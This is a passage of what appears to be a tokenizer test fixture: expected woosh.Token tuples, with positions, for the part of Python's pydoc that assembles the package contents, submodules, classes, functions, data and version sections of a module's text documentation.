woosh.Token(woosh.NEWLINE, '\r\n', 1240, 39, 1241, 0),
woosh.Token(woosh.INDENT, ' ', 1241, 0, 1241, 12),
woosh.Token(woosh.NAME, 'for', 1241, 12, 1241, 15),
woosh.Token(woosh.NAME, 'importer', 1241, 16, 1241, 24),
woosh.Token(woosh.OP, ',', 1241, 24, 1241, 25),
woosh.Token(woosh.NAME, 'modname', 1241, 26, 1241, 33),
woosh.Token(woosh.OP, ',', 1241, 33, 1241, 34),
woosh.Token(woosh.NAME, 'ispkg', 1241, 35, 1241, 40),
woosh.Token(woosh.NAME, 'in', 1241, 41, 1241, 43),
woosh.Token(woosh.NAME, 'pkgutil', 1241, 44, 1241, 51),
woosh.Token(woosh.OP, '.', 1241, 51, 1241, 52),
woosh.Token(woosh.NAME, 'iter_modules', 1241, 52, 1241, 64),
woosh.Token(woosh.OP, '(', 1241, 64, 1241, 65),
woosh.Token(woosh.NAME, 'object', 1241, 65, 1241, 71),
woosh.Token(woosh.OP, '.', 1241, 71, 1241, 72),
woosh.Token(woosh.NAME, '__path__', 1241, 72, 1241, 80),
woosh.Token(woosh.OP, ')', 1241, 80, 1241, 81),
woosh.Token(woosh.OP, ':', 1241, 81, 1241, 82),
woosh.Token(woosh.NEWLINE, '\r\n', 1241, 82, 1242, 0),
woosh.Token(woosh.INDENT, ' ', 1242, 0, 1242, 16),
woosh.Token(woosh.NAME, 'modpkgs_names', 1242, 16, 1242, 29),
woosh.Token(woosh.OP, '.', 1242, 29, 1242, 30),
woosh.Token(woosh.NAME, 'add', 1242, 30, 1242, 33),
woosh.Token(woosh.OP, '(', 1242, 33, 1242, 34),
woosh.Token(woosh.NAME, 'modname', 1242, 34, 1242, 41),
woosh.Token(woosh.OP, ')', 1242, 41, 1242, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 1242, 42, 1243, 0),
woosh.Token(woosh.NAME, 'if', 1243, 16, 1243, 18),
woosh.Token(woosh.NAME, 'ispkg', 1243, 19, 1243, 24),
woosh.Token(woosh.OP, ':', 1243, 24, 1243, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1243, 25, 1244, 0),
woosh.Token(woosh.INDENT, ' ', 1244, 0, 1244, 20),
woosh.Token(woosh.NAME, 'modpkgs', 1244, 20, 1244, 27),
woosh.Token(woosh.OP, '.', 1244, 27, 1244, 28),
woosh.Token(woosh.NAME, 'append', 1244, 28, 1244, 34),
woosh.Token(woosh.OP, '(', 1244, 34, 1244, 35),
woosh.Token(woosh.NAME, 'modname', 1244, 35, 1244, 42),
woosh.Token(woosh.OP, '+', 1244, 43, 1244, 44),
woosh.Token(woosh.STRING, "' (package)'", 1244, 45, 1244, 57),
woosh.Token(woosh.OP, ')', 1244, 57, 1244, 58),
woosh.Token(woosh.NEWLINE, '\r\n', 1244, 58, 1245, 0),
woosh.Token(woosh.DEDENT, ' ', 1245, 0, 1245, 16),
woosh.Token(woosh.NAME, 'else', 1245, 16, 1245, 20),
woosh.Token(woosh.OP, ':', 1245, 20, 1245, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 1245, 21, 1246, 0),
woosh.Token(woosh.INDENT, ' ', 1246, 0, 1246, 20),
woosh.Token(woosh.NAME, 'modpkgs', 1246, 20, 1246, 27),
woosh.Token(woosh.OP, '.', 1246, 27, 1246, 28),
woosh.Token(woosh.NAME, 'append', 1246, 28, 1246, 34),
woosh.Token(woosh.OP, '(', 1246, 34, 1246, 35),
woosh.Token(woosh.NAME, 'modname', 1246, 35, 1246, 42),
woosh.Token(woosh.OP, ')', 1246, 42, 1246, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 1246, 43, 1247, 0),
woosh.Token(woosh.DEDENT, ' ', 1248, 0, 1248, 12),
woosh.Token(woosh.DEDENT, '', 1248, 12, 1248, 12),
woosh.Token(woosh.NAME, 'modpkgs', 1248, 12, 1248, 19),
woosh.Token(woosh.OP, '.', 1248, 19, 1248, 20),
woosh.Token(woosh.NAME, 'sort', 1248, 20, 1248, 24),
woosh.Token(woosh.OP, '(', 1248, 24, 1248, 25),
woosh.Token(woosh.OP, ')', 1248, 25, 1248, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 1248, 26, 1249, 0),
woosh.Token(woosh.NAME, 'result', 1249, 12, 1249, 18),
woosh.Token(woosh.OP, '=', 1249, 19, 1249, 20),
woosh.Token(woosh.NAME, 'result', 1249, 21, 1249, 27),
woosh.Token(woosh.OP, '+', 1249, 28, 1249, 29),
woosh.Token(woosh.NAME, 'self', 1249, 30, 1249, 34),
woosh.Token(woosh.OP, '.', 1249, 34, 1249, 35),
woosh.Token(woosh.NAME, 'section', 1249, 35, 1249, 42),
woosh.Token(woosh.OP, '(', 1249, 42, 1249, 43),
woosh.Token(woosh.STRING, "'PACKAGE CONTENTS'", 1250, 16, 1250, 34),
woosh.Token(woosh.OP, ',', 1250, 34, 1250, 35),
woosh.Token(woosh.STRING, "'\\n'", 1250, 36, 1250, 40),
woosh.Token(woosh.OP, '.', 1250, 40, 1250, 41),
woosh.Token(woosh.NAME, 'join', 1250, 41, 1250, 45),
woosh.Token(woosh.OP, '(', 1250, 45, 1250, 46),
woosh.Token(woosh.NAME, 'modpkgs', 1250, 46, 1250, 53),
woosh.Token(woosh.OP, ')', 1250, 53, 1250, 54),
woosh.Token(woosh.OP, ')', 1250, 54, 1250, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 1250, 55, 1251, 0),
woosh.Token(woosh.COMMENT, '# Detect submodules as sometimes created by C extensions', 1252, 8, 1252, 64),
woosh.Token(woosh.DEDENT, ' ', 1253, 0, 1253, 8),
woosh.Token(woosh.NAME, 'submodules', 1253, 8, 1253, 18),
woosh.Token(woosh.OP, '=', 1253, 19, 1253, 20),
woosh.Token(woosh.OP, '[', 1253, 21, 1253, 22),
woosh.Token(woosh.OP, ']', 1253, 22, 1253, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 1253, 23, 1254, 0),
woosh.Token(woosh.NAME, 'for', 1254, 8, 1254, 11),
woosh.Token(woosh.NAME, 'key', 1254, 12, 1254, 15),
woosh.Token(woosh.OP, ',', 1254, 15, 1254, 16),
woosh.Token(woosh.NAME, 'value', 1254, 17, 1254, 22),
woosh.Token(woosh.NAME, 'in', 1254, 23, 1254, 25),
woosh.Token(woosh.NAME, 'inspect', 1254, 26, 1254, 33),
woosh.Token(woosh.OP, '.', 1254, 33, 1254, 34),
woosh.Token(woosh.NAME, 'getmembers', 1254, 34, 1254, 44),
woosh.Token(woosh.OP, '(', 1254, 44, 1254, 45),
woosh.Token(woosh.NAME, 'object', 1254, 45, 1254, 51),
woosh.Token(woosh.OP, ',', 1254, 51, 1254, 52),
woosh.Token(woosh.NAME, 'inspect', 1254, 53, 1254, 60),
woosh.Token(woosh.OP, '.', 1254, 60, 1254, 61),
woosh.Token(woosh.NAME, 'ismodule', 1254, 61, 1254, 69),
woosh.Token(woosh.OP, ')', 1254, 69, 1254, 70),
woosh.Token(woosh.OP, ':', 1254, 70, 1254, 71),
woosh.Token(woosh.NEWLINE, '\r\n', 1254, 71, 1255, 0),
woosh.Token(woosh.INDENT, ' ', 1255, 0, 1255, 12),
woosh.Token(woosh.NAME, 'if', 1255, 12, 1255, 14),
woosh.Token(woosh.NAME, 'value', 1255, 15, 1255, 20),
woosh.Token(woosh.OP, '.', 1255, 20, 1255, 21),
woosh.Token(woosh.NAME, '__name__', 1255, 21, 1255, 29),
woosh.Token(woosh.OP, '.', 1255, 29, 1255, 30),
woosh.Token(woosh.NAME, 'startswith', 1255, 30, 1255, 40),
woosh.Token(woosh.OP, '(', 1255, 40, 1255, 41),
woosh.Token(woosh.NAME, 'name', 1255, 41, 1255, 45),
woosh.Token(woosh.OP, '+', 1255, 46, 1255, 47),
woosh.Token(woosh.STRING, "'.'", 1255, 48, 1255, 51),
woosh.Token(woosh.OP, ')', 1255, 51, 1255, 52),
woosh.Token(woosh.NAME, 'and', 1255, 53, 1255, 56),
woosh.Token(woosh.NAME, 'key', 1255, 57, 1255, 60),
woosh.Token(woosh.NAME, 'not', 1255, 61, 1255, 64),
woosh.Token(woosh.NAME, 'in', 1255, 65, 1255, 67),
woosh.Token(woosh.NAME, 'modpkgs_names', 1255, 68, 1255, 81),
woosh.Token(woosh.OP, ':', 1255, 81, 1255, 82),
woosh.Token(woosh.NEWLINE, '\r\n', 1255, 82, 1256, 0),
woosh.Token(woosh.INDENT, ' ', 1256, 0, 1256, 16),
woosh.Token(woosh.NAME, 'submodules', 1256, 16, 1256, 26),
woosh.Token(woosh.OP, '.', 1256, 26, 1256, 27),
woosh.Token(woosh.NAME, 'append', 1256, 27, 1256, 33),
woosh.Token(woosh.OP, '(', 1256, 33, 1256, 34),
woosh.Token(woosh.NAME, 'key', 1256, 34, 1256, 37),
woosh.Token(woosh.OP, ')', 1256, 37, 1256, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 1256, 38, 1257, 0),
woosh.Token(woosh.DEDENT, ' ', 1257, 0, 1257, 8),
woosh.Token(woosh.DEDENT, '', 1257, 8, 1257, 8),
woosh.Token(woosh.NAME, 'if', 1257, 8, 1257, 10),
woosh.Token(woosh.NAME, 'submodules', 1257, 11, 1257, 21),
woosh.Token(woosh.OP, ':', 1257, 21, 1257, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 1257, 22, 1258, 0),
woosh.Token(woosh.INDENT, ' ', 1258, 0, 1258, 12),
woosh.Token(woosh.NAME, 'submodules', 1258, 12, 1258, 22),
woosh.Token(woosh.OP, '.', 1258, 22, 1258, 23),
woosh.Token(woosh.NAME, 'sort', 1258, 23, 1258, 27),
woosh.Token(woosh.OP, '(', 1258, 27, 1258, 28),
woosh.Token(woosh.OP, ')', 1258, 28, 1258, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 1258, 29, 1259, 0),
woosh.Token(woosh.NAME, 'result', 1259, 12, 1259, 18),
woosh.Token(woosh.OP, '=', 1259, 19, 1259, 20),
woosh.Token(woosh.NAME, 'result', 1259, 21, 1259, 27),
woosh.Token(woosh.OP, '+', 1259, 28, 1259, 29),
woosh.Token(woosh.NAME, 'self', 1259, 30, 1259, 34),
woosh.Token(woosh.OP, '.', 1259, 34, 1259, 35),
woosh.Token(woosh.NAME, 'section', 1259, 35, 1259, 42),
woosh.Token(woosh.OP, '(', 1259, 42, 1259, 43),
woosh.Token(woosh.STRING, "'SUBMODULES'", 1260, 16, 1260, 28),
woosh.Token(woosh.OP, ',', 1260, 28, 1260, 29),
woosh.Token(woosh.STRING, "'\\n'", 1260, 30, 1260, 34),
woosh.Token(woosh.OP, '.', 1260, 34, 1260, 35),
woosh.Token(woosh.NAME, 'join', 1260, 35, 1260, 39),
woosh.Token(woosh.OP, '(', 1260, 39, 1260, 40),
woosh.Token(woosh.NAME, 'submodules', 1260, 40, 1260, 50),
woosh.Token(woosh.OP, ')', 1260, 50, 1260, 51),
woosh.Token(woosh.OP, ')', 1260, 51, 1260, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 1260, 52, 1261, 0),
woosh.Token(woosh.DEDENT, ' ', 1262, 0, 1262, 8),
woosh.Token(woosh.NAME, 'if', 1262, 8, 1262, 10),
woosh.Token(woosh.NAME, 'classes', 1262, 11, 1262, 18),
woosh.Token(woosh.OP, ':', 1262, 18, 1262, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 1262, 19, 1263, 0),
woosh.Token(woosh.INDENT, ' ', 1263, 0, 1263, 12),
woosh.Token(woosh.NAME, 'classlist', 1263, 12, 1263, 21),
woosh.Token(woosh.OP, '=', 1263, 22, 1263, 23),
woosh.Token(woosh.OP, '[', 1263, 24, 1263, 25),
woosh.Token(woosh.NAME, 'value', 1263, 25, 1263, 30),
woosh.Token(woosh.NAME, 'for', 1263, 31, 1263, 34),
woosh.Token(woosh.NAME, 'key', 1263, 35, 1263, 38),
woosh.Token(woosh.OP, ',', 1263, 38, 1263, 39),
woosh.Token(woosh.NAME, 'value', 1263, 40, 1263, 45),
woosh.Token(woosh.NAME, 'in', 1263, 46, 1263, 48),
woosh.Token(woosh.NAME, 'classes', 1263, 49, 1263, 56),
woosh.Token(woosh.OP, ']', 1263, 56, 1263, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 1263, 57, 1264, 0),
woosh.Token(woosh.NAME, 'contents', 1264, 12, 1264, 20),
woosh.Token(woosh.OP, '=', 1264, 21, 1264, 22),
woosh.Token(woosh.OP, '[', 1264, 23, 1264, 24),
woosh.Token(woosh.NAME, 'self', 1264, 24, 1264, 28),
woosh.Token(woosh.OP, '.', 1264, 28, 1264, 29),
woosh.Token(woosh.NAME, 'formattree', 1264, 29, 1264, 39),
woosh.Token(woosh.OP, '(', 1264, 39, 1264, 40),
woosh.Token(woosh.NAME, 'inspect', 1265, 16, 1265, 23),
woosh.Token(woosh.OP, '.', 1265, 23, 1265, 24),
woosh.Token(woosh.NAME, 'getclasstree', 1265, 24, 1265, 36),
woosh.Token(woosh.OP, '(', 1265, 36, 1265, 37),
woosh.Token(woosh.NAME, 'classlist', 1265, 37, 1265, 46),
woosh.Token(woosh.OP, ',', 1265, 46, 1265, 47),
woosh.Token(woosh.NUMBER, '1', 1265, 48, 1265, 49),
woosh.Token(woosh.OP, ')', 1265, 49, 1265, 50),
woosh.Token(woosh.OP, ',', 1265, 50, 1265, 51),
woosh.Token(woosh.NAME, 'name', 1265, 52, 1265, 56),
woosh.Token(woosh.OP, ')', 1265, 56, 1265, 57),
woosh.Token(woosh.OP, ']', 1265, 57, 1265, 58),
woosh.Token(woosh.NEWLINE, '\r\n', 1265, 58, 1266, 0),
woosh.Token(woosh.NAME, 'for', 1266, 12, 1266, 15),
woosh.Token(woosh.NAME, 'key', 1266, 16, 1266, 19),
woosh.Token(woosh.OP, ',', 1266, 19, 1266, 20),
woosh.Token(woosh.NAME, 'value', 1266, 21, 1266, 26),
woosh.Token(woosh.NAME, 'in', 1266, 27, 1266, 29),
woosh.Token(woosh.NAME, 'classes', 1266, 30, 1266, 37),
woosh.Token(woosh.OP, ':', 1266, 37, 1266, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 1266, 38, 1267, 0),
woosh.Token(woosh.INDENT, ' ', 1267, 0, 1267, 16),
woosh.Token(woosh.NAME, 'contents', 1267, 16, 1267, 24),
woosh.Token(woosh.OP, '.', 1267, 24, 1267, 25),
woosh.Token(woosh.NAME, 'append', 1267, 25, 1267, 31),
woosh.Token(woosh.OP, '(', 1267, 31, 1267, 32),
woosh.Token(woosh.NAME, 'self', 1267, 32, 1267, 36),
woosh.Token(woosh.OP, '.', 1267, 36, 1267, 37),
woosh.Token(woosh.NAME, 'document', 1267, 37, 1267, 45),
woosh.Token(woosh.OP, '(', 1267, 45, 1267, 46),
woosh.Token(woosh.NAME, 'value', 1267, 46, 1267, 51),
woosh.Token(woosh.OP, ',', 1267, 51, 1267, 52),
woosh.Token(woosh.NAME, 'key', 1267, 53, 1267, 56),
woosh.Token(woosh.OP, ',', 1267, 56, 1267, 57),
woosh.Token(woosh.NAME, 'name', 1267, 58, 1267, 62),
woosh.Token(woosh.OP, ')', 1267, 62, 1267, 63),
woosh.Token(woosh.OP, ')', 1267, 63, 1267, 64),
woosh.Token(woosh.NEWLINE, '\r\n', 1267, 64, 1268, 0),
woosh.Token(woosh.DEDENT, ' ', 1268, 0, 1268, 12),
woosh.Token(woosh.NAME, 'result', 1268, 12, 1268, 18),
woosh.Token(woosh.OP, '=', 1268, 19, 1268, 20),
woosh.Token(woosh.NAME, 'result', 1268, 21, 1268, 27),
woosh.Token(woosh.OP, '+', 1268, 28, 1268, 29),
woosh.Token(woosh.NAME, 'self', 1268, 30, 1268, 34),
woosh.Token(woosh.OP, '.', 1268, 34, 1268, 35),
woosh.Token(woosh.NAME, 'section', 1268, 35, 1268, 42),
woosh.Token(woosh.OP, '(', 1268, 42, 1268, 43),
woosh.Token(woosh.STRING, "'CLASSES'", 1268, 43, 1268, 52),
woosh.Token(woosh.OP, ',', 1268, 52, 1268, 53),
woosh.Token(woosh.STRING, "'\\n'", 1268, 54, 1268, 58),
woosh.Token(woosh.OP, '.', 1268, 58, 1268, 59),
woosh.Token(woosh.NAME, 'join', 1268, 59, 1268, 63),
woosh.Token(woosh.OP, '(', 1268, 63, 1268, 64),
woosh.Token(woosh.NAME, 'contents', 1268, 64, 1268, 72),
woosh.Token(woosh.OP, ')', 1268, 72, 1268, 73),
woosh.Token(woosh.OP, ')', 1268, 73, 1268, 74),
woosh.Token(woosh.NEWLINE, '\r\n', 1268, 74, 1269, 0),
woosh.Token(woosh.DEDENT, ' ', 1270, 0, 1270, 8),
woosh.Token(woosh.NAME, 'if', 1270, 8, 1270, 10),
woosh.Token(woosh.NAME, 'funcs', 1270, 11, 1270, 16),
woosh.Token(woosh.OP, ':', 1270, 16, 1270, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 1270, 17, 1271, 0),
woosh.Token(woosh.INDENT, ' ', 1271, 0, 1271, 12),
woosh.Token(woosh.NAME, 'contents', 1271, 12, 1271, 20),
woosh.Token(woosh.OP, '=', 1271, 21, 1271, 22),
woosh.Token(woosh.OP, '[', 1271, 23, 1271, 24),
woosh.Token(woosh.OP, ']', 1271, 24, 1271, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1271, 25, 1272, 0),
woosh.Token(woosh.NAME, 'for', 1272, 12, 1272, 15),
woosh.Token(woosh.NAME, 'key', 1272, 16, 1272, 19),
woosh.Token(woosh.OP, ',', 1272, 19, 1272, 20),
woosh.Token(woosh.NAME, 'value', 1272, 21, 1272, 26),
woosh.Token(woosh.NAME, 'in', 1272, 27, 1272, 29),
woosh.Token(woosh.NAME, 'funcs', 1272, 30, 1272, 35),
woosh.Token(woosh.OP, ':', 1272, 35, 1272, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 1272, 36, 1273, 0),
woosh.Token(woosh.INDENT, ' ', 1273, 0, 1273, 16),
woosh.Token(woosh.NAME, 'contents', 1273, 16, 1273, 24),
woosh.Token(woosh.OP, '.', 1273, 24, 1273, 25),
woosh.Token(woosh.NAME, 'append', 1273, 25, 1273, 31),
woosh.Token(woosh.OP, '(', 1273, 31, 1273, 32),
woosh.Token(woosh.NAME, 'self', 1273, 32, 1273, 36),
woosh.Token(woosh.OP, '.', 1273, 36, 1273, 37),
woosh.Token(woosh.NAME, 'document', 1273, 37, 1273, 45),
woosh.Token(woosh.OP, '(', 1273, 45, 1273, 46),
woosh.Token(woosh.NAME, 'value', 1273, 46, 1273, 51),
woosh.Token(woosh.OP, ',', 1273, 51, 1273, 52),
woosh.Token(woosh.NAME, 'key', 1273, 53, 1273, 56),
woosh.Token(woosh.OP, ',', 1273, 56, 1273, 57),
woosh.Token(woosh.NAME, 'name', 1273, 58, 1273, 62),
woosh.Token(woosh.OP, ')', 1273, 62, 1273, 63),
woosh.Token(woosh.OP, ')', 1273, 63, 1273, 64),
woosh.Token(woosh.NEWLINE, '\r\n', 1273, 64, 1274, 0),
woosh.Token(woosh.DEDENT, ' ', 1274, 0, 1274, 12),
woosh.Token(woosh.NAME, 'result', 1274, 12, 1274, 18),
woosh.Token(woosh.OP, '=', 1274, 19, 1274, 20),
woosh.Token(woosh.NAME, 'result', 1274, 21, 1274, 27),
woosh.Token(woosh.OP, '+', 1274, 28, 1274, 29),
woosh.Token(woosh.NAME, 'self', 1274, 30, 1274, 34),
woosh.Token(woosh.OP, '.', 1274, 34, 1274, 35),
woosh.Token(woosh.NAME, 'section', 1274, 35, 1274, 42),
woosh.Token(woosh.OP, '(', 1274, 42, 1274, 43),
woosh.Token(woosh.STRING, "'FUNCTIONS'", 1274, 43, 1274, 54),
woosh.Token(woosh.OP, ',', 1274, 54, 1274, 55),
woosh.Token(woosh.STRING, "'\\n'", 1274, 56, 1274, 60),
woosh.Token(woosh.OP, '.', 1274, 60, 1274, 61),
woosh.Token(woosh.NAME, 'join', 1274, 61, 1274, 65),
woosh.Token(woosh.OP, '(', 1274, 65, 1274, 66),
woosh.Token(woosh.NAME, 'contents', 1274, 66, 1274, 74),
woosh.Token(woosh.OP, ')', 1274, 74, 1274, 75),
woosh.Token(woosh.OP, ')', 1274, 75, 1274, 76),
woosh.Token(woosh.NEWLINE, '\r\n', 1274, 76, 1275, 0),
woosh.Token(woosh.DEDENT, ' ', 1276, 0, 1276, 8),
woosh.Token(woosh.NAME, 'if', 1276, 8, 1276, 10),
woosh.Token(woosh.NAME, 'data', 1276, 11, 1276, 15),
woosh.Token(woosh.OP, ':', 1276, 15, 1276, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 1276, 16, 1277, 0),
woosh.Token(woosh.INDENT, ' ', 1277, 0, 1277, 12),
woosh.Token(woosh.NAME, 'contents', 1277, 12, 1277, 20),
woosh.Token(woosh.OP, '=', 1277, 21, 1277, 22),
woosh.Token(woosh.OP, '[', 1277, 23, 1277, 24),
woosh.Token(woosh.OP, ']', 1277, 24, 1277, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1277, 25, 1278, 0),
woosh.Token(woosh.NAME, 'for', 1278, 12, 1278, 15),
woosh.Token(woosh.NAME, 'key', 1278, 16, 1278, 19),
woosh.Token(woosh.OP, ',', 1278, 19, 1278, 20),
woosh.Token(woosh.NAME, 'value', 1278, 21, 1278, 26),
woosh.Token(woosh.NAME, 'in', 1278, 27, 1278, 29),
woosh.Token(woosh.NAME, 'data', 1278, 30, 1278, 34),
woosh.Token(woosh.OP, ':', 1278, 34, 1278, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 1278, 35, 1279, 0),
woosh.Token(woosh.INDENT, ' ', 1279, 0, 1279, 16),
woosh.Token(woosh.NAME, 'contents', 1279, 16, 1279, 24),
woosh.Token(woosh.OP, '.', 1279, 24, 1279, 25),
woosh.Token(woosh.NAME, 'append', 1279, 25, 1279, 31),
woosh.Token(woosh.OP, '(', 1279, 31, 1279, 32),
woosh.Token(woosh.NAME, 'self', 1279, 32, 1279, 36),
woosh.Token(woosh.OP, '.', 1279, 36, 1279, 37),
woosh.Token(woosh.NAME, 'docother', 1279, 37, 1279, 45),
woosh.Token(woosh.OP, '(', 1279, 45, 1279, 46),
woosh.Token(woosh.NAME, 'value', 1279, 46, 1279, 51),
woosh.Token(woosh.OP, ',', 1279, 51, 1279, 52),
woosh.Token(woosh.NAME, 'key', 1279, 53, 1279, 56),
woosh.Token(woosh.OP, ',', 1279, 56, 1279, 57),
woosh.Token(woosh.NAME, 'name', 1279, 58, 1279, 62),
woosh.Token(woosh.OP, ',', 1279, 62, 1279, 63),
woosh.Token(woosh.NAME, 'maxlen', 1279, 64, 1279, 70),
woosh.Token(woosh.OP, '=', 1279, 70, 1279, 71),
woosh.Token(woosh.NUMBER, '70', 1279, 71, 1279, 73),
woosh.Token(woosh.OP, ')', 1279, 73, 1279, 74),
woosh.Token(woosh.OP, ')', 1279, 74, 1279, 75),
woosh.Token(woosh.NEWLINE, '\r\n', 1279, 75, 1280, 0),
woosh.Token(woosh.DEDENT, ' ', 1280, 0, 1280, 12),
woosh.Token(woosh.NAME, 'result', 1280, 12, 1280, 18),
woosh.Token(woosh.OP, '=', 1280, 19, 1280, 20),
woosh.Token(woosh.NAME, 'result', 1280, 21, 1280, 27),
woosh.Token(woosh.OP, '+', 1280, 28, 1280, 29),
woosh.Token(woosh.NAME, 'self', 1280, 30, 1280, 34),
woosh.Token(woosh.OP, '.', 1280, 34, 1280, 35),
woosh.Token(woosh.NAME, 'section', 1280, 35, 1280, 42),
woosh.Token(woosh.OP, '(', 1280, 42, 1280, 43),
woosh.Token(woosh.STRING, "'DATA'", 1280, 43, 1280, 49),
woosh.Token(woosh.OP, ',', 1280, 49, 1280, 50),
woosh.Token(woosh.STRING, "'\\n'", 1280, 51, 1280, 55),
woosh.Token(woosh.OP, '.', 1280, 55, 1280, 56),
woosh.Token(woosh.NAME, 'join', 1280, 56, 1280, 60),
woosh.Token(woosh.OP, '(', 1280, 60, 1280, 61),
woosh.Token(woosh.NAME, 'contents', 1280, 61, 1280, 69),
woosh.Token(woosh.OP, ')', 1280, 69, 1280, 70),
woosh.Token(woosh.OP, ')', 1280, 70, 1280, 71),
woosh.Token(woosh.NEWLINE, '\r\n', 1280, 71, 1281, 0),
woosh.Token(woosh.DEDENT, ' ', 1282, 0, 1282, 8),
woosh.Token(woosh.NAME, 'if', 1282, 8, 1282, 10),
woosh.Token(woosh.NAME, 'hasattr', 1282, 11, 1282, 18),
woosh.Token(woosh.OP, '(', 1282, 18, 1282, 19),
woosh.Token(woosh.NAME, 'object', 1282, 19, 1282, 25),
woosh.Token(woosh.OP, ',', 1282, 25, 1282, 26),
woosh.Token(woosh.STRING, "'__version__'", 1282, 27, 1282, 40),
woosh.Token(woosh.OP, ')', 1282, 40, 1282, 41),
woosh.Token(woosh.OP, ':', 1282, 41, 1282, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 1282, 42, 1283, 0),
woosh.Token(woosh.INDENT, ' ', 1283, 0, 1283, 12),
woosh.Token(woosh.NAME, 'version', 1283, 12, 1283, 19),
woosh.Token(woosh.OP, '=', 1283, 20, 1283, 21),
woosh.Token(woosh.NAME, 'str', 1283, 22, 1283, 25),
woosh.Token(woosh.OP, '(', 1283, 25, 1283, 26),
woosh.Token(woosh.NAME, 'object', 1283, 26, 1283, 32),
woosh.Token(woosh.OP, '.', 1283, 32, 1283, 33),
woosh.Token(woosh.NAME, '__version__', 1283, 33, 1283, 44),
woosh.Token(woosh.OP, ')', 1283, 44, 1283, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 1283, 45, 1284, 0),
woosh.Token(woosh.NAME, 'if', 1284, 12, 1284, 14),
woosh.Token(woosh.NAME, 'version', 1284, 15, 1284, 22),
woosh.Token(woosh.OP, '[', 1284, 22, 1284, 23),
woosh.Token(woosh.OP, ':', 1284, 23, 1284, 24),
woosh.Token(woosh.NUMBER, '11', 1284, 24, 1284, 26),
woosh.Token(woosh.OP, ']', 1284, 26, 1284, 27),
woosh.Token(woosh.OP, '==', 1284, 28, 1284, 30),
woosh.Token(woosh.STRING, "'$'", 1284, 31, 1284, 34),
woosh.Token(woosh.OP, '+', 1284, 35, 1284, 36),
woosh.Token(woosh.STRING, "'Revision: '", 1284, 37, 1284, 49),
woosh.Token(woosh.NAME, 'and', 1284, 50, 1284, 53),
woosh.Token(woosh.NAME, 'version', 1284, 54, 1284, 61),
woosh.Token(woosh.OP, '[', 1284, 61, 1284, 62),
woosh.Token(woosh.OP, '-', 1284, 62, 1284, 63),
woosh.Token(woosh.NUMBER, '1', 1284, 63, 1284, 64),
woosh.Token(woosh.OP, ':', 1284, 64, 1284, 65),
woosh.Token(woosh.OP, ']', 1284, 65, 1284, 66),
woosh.Token(woosh.OP, '==', 1284, 67, 1284, 69),
woosh.Token(woosh.STRING, "'$'", 1284, 70, 1284, 73),
woosh.Token(woosh.OP, ':', 1284, 73, 1284, 74),
woosh.Token(woosh.NEWLINE, '\r\n', 1284, 74, 1285, 0),
woosh.Token(woosh.INDENT, ' ', 1285, 0, 1285, 16),
woosh.Token(woosh.NAME, 'version', 1285, 16, 1285, 23),
woosh.Token(woosh.OP, '=', 1285, 24, 1285, 25),
woosh.Token(woosh.NAME, 'version', 1285, 26, 1285, 33),
woosh.Token(woosh.OP, '[', 1285, 33, 1285, 34),
woosh.Token(woosh.NUMBER, '11', 1285, 34, 1285, 36),
woosh.Token(woosh.OP, ':', 1285, 36, 1285, 37),
woosh.Token(woosh.OP, '-', 1285, 37, 1285, 38),
woosh.Token(woosh.NUMBER, '1', 1285, 38, 1285, 39),
woosh.Token(woosh.OP, ']', 1285, 39, 1285, 40),
woosh.Token(woosh.OP, '.', 1285, 40, 1285, 41),
woosh.Token(woosh.NAME, 'strip', 1285, 41, 1285, 46),
woosh.Token(woosh.OP, '(', 1285, 46, 1285, 47),
woosh.Token(woosh.OP, ')', 1285, 47, 1285, 48),
woosh.Token(woosh.NEWLINE, '\r\n', 1285, 48, 1286, 0),
woosh.Token(woosh.DEDENT, ' ', 1286, 0, 1286, 12),
woosh.Token(woosh.NAME, 'result', 1286, 12, 1286, 18),
woosh.Token(woosh.OP, '=', 1286, 19, 1286, 20),
woosh.Token(woosh.NAME, 'result', 1286, 21, 1286, 27),
woosh.Token(woosh.OP, '+', 1286, 28, 1286, 29),
woosh.Token(woosh.NAME, 'self', 1286, 30, 1286, 34),
woosh.Token(woosh.OP, '.', 1286, 34, 1286, 35),
woosh.Token(woosh.NAME, 'section', 1286, 35, 1286, 42),
woosh.Token(woosh.OP, '(', 1286, 42, 1286, 43),
woosh.Token(woosh.STRING, "'VERSION'", 1286, 43, 1286, 52),
woosh.Token(woosh.OP, ',', 1286, 52, 1286, 53),
woosh.Token(woosh.NAME, 'version', 1286, 54, 1286, 61),
woosh.Token(woosh.OP, ')', 1286, 61, 1286, 62),
woosh.Token(woosh.NEWLINE, '\r\n', 1286, 62, 1287, 0),
woosh.Token(woosh.DEDENT, ' ', 1287, 0, 1287, 8),
woosh.Token(woosh.NAME, 'if', 1287, 8, 1287, 10),
woosh.Token(woosh.NAME, 'hasattr', 1287, 11, 1287, 18),
woosh.Token(woosh.OP, '(', 1287, 18, 1287, 19),
woosh.Token(woosh.NAME, 'object', 1287, 19, 1287, 25),
woosh.Token(woosh.OP, ',', 1287, 25, 1287, 26),
woosh.Token(woosh.STRING, "'__date__'", 1287, 27, 1287, 37),
woosh.Token(woosh.OP, ')', 1287, 37, 1287, 38),
woosh.Token(woosh.OP, ':', 1287, 38, 1287, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 1287, 39, 1288, 0),
woosh.Token(woosh.INDENT, ' ', 1288, 0, 1288, 12),
woosh.Token(woosh.NAME, 'result', 1288, 12, 1288, 18),
